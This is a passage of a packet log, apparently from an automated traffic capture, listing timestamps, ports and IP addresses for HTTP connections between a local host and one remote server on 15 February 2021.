Feb 15, 2021 21:26:43.969489098 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.969496965 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.969513893 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.969525099 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.969538927 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.969547987 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.969575882 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.970716953 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.970746994 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.970772028 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.970772028 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.970794916 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.970801115 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.970817089 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.970834017 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.971016884 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.971080065 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:43.979121923 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:43.979240894 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009505033 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009536982 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009557962 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009584904 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009610891 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009637117 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009654999 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009664059 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009682894 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009691000 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009716988 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009725094 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009742022 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009742975 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009766102 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.009774923 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009792089 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.009819031 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.010003090 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.010358095 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.011626959 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.011657953 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.011682034 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.011707067 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.011730909 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.011730909 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.011753082 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.011759996 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.011771917 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.011802912 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.016746998 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.018323898 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050607920 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050642014 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050666094 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050689936 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050709963 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050715923 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050736904 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050744057 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050769091 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050775051 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050796986 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050801992 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050820112 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050827980 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050837994 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050853968 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050865889 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050879955 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050888062 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.050951004 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.050992966 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.051125050 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.056988001 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.057069063 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.092161894 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092189074 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092206955 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092223883 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092242002 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092257977 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092276096 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092278957 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.092293024 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092309952 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092312098 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.092331886 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092334986 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.092350960 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.092358112 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.092385054 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.093276978 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.096563101 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.098181009 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.098205090 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.098217964 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.098229885 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.098244905 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.098258018 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.098321915 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.098361969 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.099148035 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.099216938 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.132559061 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132590055 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132606030 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132622957 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132638931 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132653952 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132671118 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132687092 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132703066 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132716894 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.132721901 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132739067 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132759094 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.132766962 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.132788897 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.134771109 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.134812117 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.134835005 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.134859085 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.134885073 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.134929895 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.134962082 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.135041952 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.136490107 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.137280941 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.137367010 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.173898935 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.173928976 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.173943996 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.173960924 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.173998117 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174015045 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174031019 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174047947 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174051046 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.174065113 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174082994 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174098969 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174107075 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.174122095 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.174135923 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.174159050 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.174186945 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.175679922 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.175709009 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.175728083 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.175744057 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.175762892 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.175781965 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.175791025 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.175847054 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.178715944 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.180425882 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.213227987 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213267088 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213279009 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213294983 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213311911 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213326931 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213344097 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213360071 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213377953 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213417053 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213418007 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.213437080 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213455915 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.213479996 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.213511944 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.216005087 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216037035 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216054916 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216073036 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216084957 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216100931 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216116905 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216134071 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216149092 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.216150999 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216173887 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216191053 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216202021 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.216208935 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216229916 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216244936 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.216278076 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.216614008 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.220295906 CET	49755	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.268676043 CET	80	49755	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.306616068 CET	49756	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.394963980 CET	80	49756	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.431600094 CET	80	49756	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:44.432579041 CET	49756	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.479969978 CET	49756	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:44.525402069 CET	80	49756	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:46.855597973 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:46.855756998 CET	49761	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:46.901885033 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:46.901917934 CET	80	49761	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:46.902004957 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:46.902086973 CET	49761	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:46.909322977 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:46.997993946 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384097099 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384141922 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384166002 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384188890 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384211063 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384217978 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.384233952 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.384274960 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.384308100 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.423949003 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.423989058 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.424012899 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.424037933 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.424118996 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.424165964 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433705091 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433753967 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433784962 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433815002 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433821917 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433844090 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433851957 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433872938 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433881044 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433902025 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433902025 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433932066 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433938026 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433954954 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.433975935 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.433994055 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.434022903 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.463941097 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.464034081 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.464150906 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.464174032 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.466543913 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.467547894 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.469845057 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469866037 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469882011 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469898939 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469916105 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469932079 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469938040 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.469949007 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.469961882 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.469969034 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.470005035 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.470019102 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.479635000 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479680061 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479703903 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479711056 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.479724884 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479748964 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.479749918 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479773045 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479785919 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.479793072 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.479806900 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.479836941 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.504271030 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.504313946 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.504338980 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.504360914 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.504420996 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.504462004 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.504512072 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.504595041 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.509860039 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.510135889 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.544717073 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544742107 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544754982 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544771910 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544786930 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544802904 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544817924 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544836998 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544852972 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.544853926 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544871092 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544886112 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.544907093 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.544933081 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.545181036 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.545465946 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.546981096 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.547003984 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.547023058 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.547040939 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.547055960 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.547071934 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.547091007 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.547136068 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.550172091 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.550614119 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.586961031 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589728117 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589746952 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589760065 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589775085 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589795113 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589812040 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589827061 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589843988 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589859962 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589874983 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589890003 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.589900970 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.589978933 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.592298031 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.592921972 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.624228954 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624254942 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624267101 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624291897 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624309063 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624324083 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624341965 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624360085 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624375105 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624391079 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624399900 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.624408007 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624423981 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.624428034 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.624455929 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.624481916 CET	49760	80	192.168.2.5	34.65.144.159
Feb 15, 2021 21:26:47.627204895 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.627226114 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.627239943 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.627255917 CET	80	49760	34.65.144.159	192.168.2.5
Feb 15, 2021 21:26:47.627270937 CET	80	49760	34.65.144.159	192.168.2.5
